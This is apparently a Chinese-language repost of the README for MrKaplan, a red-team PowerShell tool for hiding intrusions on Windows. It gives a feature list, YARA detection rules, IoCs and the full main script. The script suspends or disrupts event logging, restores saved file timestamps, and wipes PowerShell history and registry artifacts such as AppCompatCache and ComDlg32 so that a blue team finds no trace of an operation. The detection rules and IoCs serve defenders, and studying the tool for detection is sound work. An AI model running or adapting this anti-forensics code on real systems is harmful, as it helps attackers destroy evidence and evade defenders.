Idov31/MrKaplan

描述

MrKaplan 是一种工具,旨在通过清除执行证据来帮助红队人员保持隐藏状态。它的工作原理是保存运行时间、文件快照等信息,并将每个证据与相关用户相关联。
这个工具的灵感来自MoonWalk,这是一个用于 Unix 机器的类似工具。
您可以在wiki页面中阅读有关它的更多信息。

功能

  • 停止事件记录
  • 清除文件工件
  • 清除注册表工件
  • 可以为多个用户运行
  • 可以作为用户和管理员运行(强烈建议以管理员身份运行)
  • 可以保存文件的时间戳

  • 可以排除某些操作并将工件留给蓝队

    用法

  • 在计算机上开始操作之前,使用开始标志运行 MrKaplan,每当您完成时再次使用结束标志运行它。

  • 不要删除 MrKaplan 注册表项,否则 MrKaplan 将无法使用该信息。

MrKaplan:隐藏和清理代码执行痕迹 - 图1

代码

YARA

  1. /*
  2.     A rule to detect MrKaplan.
  3.     Author: Ido Veltzman (Idov31)
  4.     Date: 15-04-2022
  5. */
  6. rule MrKaplanStandalone {
  7.     meta:
  8.         description = "A rule to detect MrKaplanStandalone."
  9.         author = "Idov31"
  10.         date = "2022-04-15"
  12.     strings:
  13.         $imports1 = /[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(.*) | Invoke-Expression/i nocase
  14.         $imports2 = /[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(.*) | iex/i nocase
  16.         $s1 = "MrKaplan.ps1" ascii nocase
  17.         $s2 = "Clear-Evidence" ascii nocase
  18.         $s3 = "EventLogSettings" ascii nocase
  19.         $s4 = "runAsUser" ascii nocase
  20.         $s5 = "PSHistory" ascii nocase
  21.         $s6 = "C:\\Users\\$($user)\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt" ascii nocase
  22.         $s7 = "HKCU:\Software\MrKaplan" ascii nocase
  23.         $s8 = "Invoke-StompFiles" ascii nocase
  24.         $s9 = "Clear-Files" ascii nocase
  25.         $s10 = "Clear-Registry" ascii nocase
  26.         $s11 = "Invoke-RestoreEtw" ascii nocase
  27.         $s12 = "Invoke-LogFileToStomp" ascii nocase
  28.         $s13 = "Invoke-SuspendEtw" ascii nocase
  30.     conditions:
  31.         any of $imports* and 3 of ($s*)
  32. }
  34. rule MrKaplan {
  35.     meta:
  36.         description = "A rule to detect MrKaplan."
  37.         author = "Idov31"
  38.         date = "2022-04-15"
  40.     strings:
  41.         $imports1 = "Import-Module .\\Modules\\Registry.psm1" ascii nocase
  42.         $imports2 = "Import-Module .\\Modules\\Files.psm1" ascii nocase
  43.         $imports3 = "Import-Module .\\Modules\\Eventlogs.psm1" ascii nocase
  44.         $imports4 = "Import-Module .\\Modules\\Utils.psm1" ascii nocase
  45.         $imports5 = "ipmo .\\Modules\\Registry.psm1" ascii nocase
  46.         $imports6 = "ipmo .\\Modules\\Files.psm1" ascii nocase
  47.         $imports7 = "ipmo .\\Modules\\Eventlogs.psm1" ascii nocase
  48.         $imports8 = "ipmo .\\Modules\\Utils.psm1" ascii nocase
  51.         $s1 = "MrKaplan.ps1" ascii nocase
  52.         $s2 = "Clear-Evidence" ascii nocase
  53.         $s3 = "EventLogSettings" ascii nocase
  54.         $s4 = "runAsUser" ascii nocase
  55.         $s5 = "PSHistory" ascii nocase
  56.         $s6 = "C:\\Users\\$($user)\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt" ascii nocase
  57.         $s7 = "HKCU:\Software\MrKaplan" ascii nocase
  58.         $s8 = "Invoke-StompFiles" ascii nocase
  59.         $s9 = "Clear-Files" ascii nocase
  60.         $s10 = "Clear-Registry" ascii nocase
  61.         $s11 = "Invoke-RestoreEtw" ascii nocase
  62.         $s12 = "Invoke-LogFileToStomp" ascii nocase
  63.         $s13 = "Invoke-SuspendEtw" ascii nocase
  65.     conditions:
  66.         4 of $imports* and 3 of ($s*)
  67. }

PowerShell

  1. param (
  2.     [Parameter(Mandatory=$true)]
  3.     [String]
  4.     $operation,
  6.     [String]
  7.     $etwBypassMethod,
  9.     [String]
  10.     $stompedFilePath,
  12.     [String[]]
  13.     $users,
  15.     [String[]]
  16.     $exclusions,
  18.     [Switch]
  19.     $runAsUser = $false
  20. )
  22. Import-Module .\Modules\Registry.psm1
  23. Import-Module .\Modules\Files.psm1
  24. Import-Module .\Modules\Eventlogs.psm1
  25. Import-Module .\Modules\Utils.psm1
  27. $rootKeyPath = "HKCU:\Software\MrKaplan"
  28. $PSDefaultParameterValues['*:Encoding'] = 'utf8'
  29. $usage = "`n[*] Possible Usage:`n`n[*] Show help message:`n`t.\MrKaplan.ps1 help`n`n[*] For config creation and start:`n`t.\MrKaplan.ps1 begin`n`t.\MrKaplan.ps1 begin -Users Reddington,Liz`n`t.\MrKaplan.ps1 begin -Users Reddington`n`t.\MrKaplan.ps1 begin -EtwBypassMethod overflow`n`t.\MrKaplan.ps1 begin -RunAsUser`n`t.\MrKaplan.ps1 begin -Exclusions BamKey, OfficeHistory`n`n[*] For cleanup:`n`t.\MrKaplan.ps1 end`n`n[*] To save file's timestamps:`n`t.\MrKaplan.ps1 timestomp -StompedFilePath C:\path\to\file`n`n"
  31. if (Test-Path "banner.txt") {
  32.     $banner = Get-Content -Path "banner.txt" -Raw
  33.     Write-Host $banner
  34. }
  36. function New-Config {
  37.     param (
  38.         [String[]]
  39.         $users,
  41.         [String]
  42.         $etwBypassMethod,
  44.         [String[]]
  45.         $exclusions
  46.     )
  47.     New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS
  49.     if (Test-Path $rootKeyPath) {
  50.         Write-Host "[-] Config already exists, please delete the current and rerun." -ForegroundColor Red
  51.         return $false
  52.     }
  53.     New-Item -Path $rootKeyPath
  54.     New-Item -Path $rootKeyPath -Name "Users"
  56.     if (-not $exclusions) {
  57.         $exclusions = @()
  58.     }
  60.     # Stopping the event logging.
  61.     if (-not $runAsUser) {
  62.         New-ItemProperty -Path $rootKeyPath -Name "RunAsUser" -PropertyType "DWord" -Value $false
  64.         if (-not $exclusions.Contains("eventlogs")) {
  65.             Write-Host "[*] Stopping event logging..." -ForegroundColor Blue
  67.             if ($etwBypassMethod -eq "overflow") {
  68.                 Write-Host "[*] This method won't allow any regular user to log in until you end MrKaplan." -ForegroundColor Yellow
  70.                 if ($(Read-Host "Are you sure? [y/n]") -eq "y") {
  71.                     $etwMetadata = Get-EventLogsSettings
  73.                     if ($etwMetadata.Count -eq 0) {
  74.                         return $false
  75.                     }
  77.                     if (!$(Clear-EventLogging)) {
  78.                         return $false
  79.                     }
  81.                     New-Item -Path $rootKeyPath -Name "EventLogSettings"
  82.                     foreach ($setting in $etwMetadata.GetEnumerator()) {
  83.                         New-ItemProperty -Path "$($rootKeyPath)\EventLogSettings" -Name $setting.Name -Value $setting.Value
  84.                     }
  85.                 }
  86.                 else {
  87.                     Write-Host "[-] Exiting..." -ForegroundColor Red
  88.                     return $false
  89.                 }
  90.             }
  91.             elseif ($etwBypassMethod -eq "suspend" -or $etwBypassMethod -eq "") {
  92.                 $etwMetadata = Invoke-SuspendEtw
  94.                 if ($etwMetadata.Count -eq 0) {
  95.                     return $false
  96.                 }
  98.                 New-Item -Path $rootKeyPath -Name "EventLogSettings"
  99.                 foreach ($setting in $etwMetadata[1].GetEnumerator()) {
  100.                     New-ItemProperty -Path "$($rootKeyPath)\EventLogSettings" -Name $setting.Name -Value $setting.Value
  101.                 }
  103.             }
  104.             else {
  105.                 Write-Host "[-] Unknown ETW patching method, exiting..." -ForegroundColor Red
  106.                 return $false
  107.             }
  109.             Write-Host "[+] Stopped event logging." -ForegroundColor Green
  110.         }
  113.         if (-not $exclusions.Contains("appcompatcache")) {
  114.             Copy-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache" -Destination "$($rootKeyPath)\AppCompatCache" -Force -Recurse
  115.         }
  116.     }
  117.     else {
  118.         New-ItemProperty -Path $rootKeyPath -Name "RunAsUser" -Value $true
  120.     }
  122.     if ($users) {
  123.         if (!$runAsUser) {
  124.             $users.Add($env:USERNAME)
  125.         }
  126.         else {
  127.             Write-Host "[-] Cannot use both run as user and users!" -ForegroundColor Red
  128.             return $false
  129.         }
  130.     }
  131.     else {
  132.         $users = @($env:USERNAME)
  133.     }
  135.     # Saving current time.
  136.     New-ItemProperty -Path $rootKeyPath -Name "Time" -Value $(Get-Date).DateTime
  138.     # Saving user data.
  139.     $comDlg32Path = "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32"
  141.     foreach ($user in $users) {
  143.         if ($exclusions.Contains("pshistory")) {
  144.             $powershellHistory = ""
  145.         }
  146.         else {
  147.             $powershellHistoryFile = "C:\Users\$($user)\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
  149.             if (Test-Path $powershellHistoryFile) {
  150.                 $powershellHistory = [Convert]::ToBase64String([IO.File]::ReadAllBytes($powershellHistoryFile))
  151.             }
  152.             else {
  153.                 $powershellHistory = ""
  154.             }
  155.         }
  157.         New-Item -Path "$($rootKeyPath)\Users" -Name $user
  158.         New-ItemProperty -Path "$($rootKeyPath)\Users\$($user)" -Name "PSHistory" -Value $powershellHistory
  160.         if (-not $exclusions.Contains("comdlg32")) {
  161.             $sid = $(New-Object System.Security.Principal.NTAccount($user)).Translate([System.Security.Principal.SecurityIdentifier]).Value
  163.             if (!(Test-Path "HKU:\$($sid)\$($comDlg32Path)")) {
  164.                 continue
  165.             }
  166.             Copy-Item "HKU:\$($sid)\$($comDlg32Path)" -Destination "$($rootKeyPath)\Users\$($user)" -Force -Recurse
  167.         }
  168.     }
  170.     New-ItemProperty -Path $rootKeyPath -Name "Exclusions" -Value $exclusions
  172.     return $true
  173. }
  175. function Clear-Evidence {
  176.     $result = $true
  178.     # Parsing the config.
  179.     if (-not (Test-Path $rootKeyPath)) {
  180.         Write-Host "[-] Config doesn't exist" -ForegroundColor Red
  181.         return $false
  182.     }
  184.     # Running the modules on each user.
  185.     Write-Host "[*] Cleaning logs..." -ForegroundColor Blue
  186.     $users = $(Get-ChildItem -Path "$($rootKeyPath)\Users" | Select-Object PSChildName).PSChildName
  187.     $runAsUser =$(Get-ItemProperty -Path $rootKeyPath -Name "RunAsUser").RunAsUser
  188.     $time = $(Get-ItemProperty -Path $rootKeyPath -Name "Time").Time
  189.     $exclusions = $(Get-ItemProperty -Path $rootKeyPath -Name "Exclusions").Exclusions
  191.     # Stomping the files.
  192.     $filesToStomp = @{}
  194.     if (Test-Path "$($rootKeyPath)\StompedFiles") {
  195.         $regFilesToStomp = Get-ItemProperty "$($rootKeyPath)\StompedFiles"
  196.         $regFilesToStomp.PsObject.Properties | 
  197.             ForEach-Object {
  198.                 $filesToStomp[$_.Name] = $_.Value
  199.             }
  200.     }
  201.     Invoke-StompFiles $filesToStomp
  203.     foreach ($user in $users) {
  204.         $psHistory = $(Get-ItemProperty -Path "$($rootKeyPath)\Users\$($user)" -Name "PSHistory").PSHistory
  205.         if (-not $(Clear-Files $time $psHistory $user $runAsUser $exclusions)) {
  206.             Write-Host "[-] Failed to clean files for $($user)." -ForegroundColor Red
  207.             $result = $false
  208.         }
  209.     }
  211.     if (!$(Clear-Registry $time $users $runAsUser $exclusions $rootKeyPath)) {
  212.         Write-Host "[-] Failed to cleanup the registry." -ForegroundColor Red
  213.         $result = $false
  214.     }
  216.     # Restoring the event logging.
  217.     if (!$runAsUser -and -not $exclusions.Contains("eventlogs")) {
  218.         Write-Host "[*] Restoring event logging..." -ForegroundColor Blue
  220.         if (Test-Path "$($rootKeyPath)\EventLogSettings") {
  221.             $etwMetadata = @{}
  222.             $regEventLog = Get-ItemProperty "$($rootKeyPath)\EventLogSettings"
  223.             $regEventLog.PsObject.Properties | 
  224.                 ForEach-Object {
  225.                     $etwMetadata[$_.Name] = $_.Value
  226.                 }
  228.             if (!$(Invoke-RestoreEtw $etwMetadata)) {
  229.                 Write-Host "[-] Failed to restore the eventlogging." -ForegroundColor Red
  230.                 $result = $false
  231.             }
  232.         }
  233.     }
  235.     if ($result) {
  236.         Write-Host "[+] Restored! Be careful with your actions now." -ForegroundColor Green
  237.         Remove-Item -Path $rootKeyPath -Recurse -Force
  238.     }
  239.     else {
  240.         Write-Host "[!] Finished with partial restoration." -ForegroundColor Yellow
  241.     }
  243.     return $result
  244. }
  246. if ($operation -eq "begin") {
  247.     for ($i = 0; $i -lt $exclusions.Count; $i++) { 
  248.         $exclusions[$i] = $exclusions[$i].ToLower() 
  249.     }
  251.     if (New-Config $users $etwBypassMethod $exclusions) {
  252.         Write-Host "`n[+] Saved required information!`n[+] You can do your operations." -ForegroundColor Green
  253.     }
  254.     else {
  255.         Write-Host "`n[-] Failed to create config file." -ForegroundColor Red
  256.     }
  257. }
  259. elseif ($operation -eq "end") {
  260.     if (Clear-Evidence) {
  261.         Write-Host "`n[+] All evidences cleared!" -ForegroundColor Green
  262.     }
  263.     else {
  264.         Write-Host "`n[-] Failed to clear all evidences." -ForegroundColor Red
  265.     }
  266. }
  268. elseif ($operation -eq "timestomp") {
  269.     if (Invoke-LogFileToStomp $rootKeyPath $stompedFilePath) {
  270.         Write-Host "`n[+] Saved file's timestamps." -ForegroundColor Green
  271.     }       
  272.     else {
  273.         Write-Host "`n[-] Failed to save timestamps." -ForegroundColor Red
  274.     }
  275. }
  277. elseif ($operation -eq "help") {
  278.     Write-Host $usage -ForegroundColor Blue
  279. }
  281. else {
  282.     Write-Host "`n[!] Invalid Usage!" -ForegroundColor Red
  283.     Write-Host $usage -ForegroundColor Blue
  284. }

IoCs

  • 访问 wiki 页面中提到的工件的 Powershell 进程。
  • Powershell 导入奇怪的 base64 blob。
  • 执行令牌操作的 Powershell 进程。

  • MrKaplan 的注册表项:HKCU:\Software\MrKaplan。

    致谢

  • PowerSploit

  • Phant0m
  • ForensicArtifacts

    免责声明

    对于由于此项目而对您的计算机/程序造成的任何损害,我概不负责。我很高兴接受贡献,提出拉取请求,我会审查它!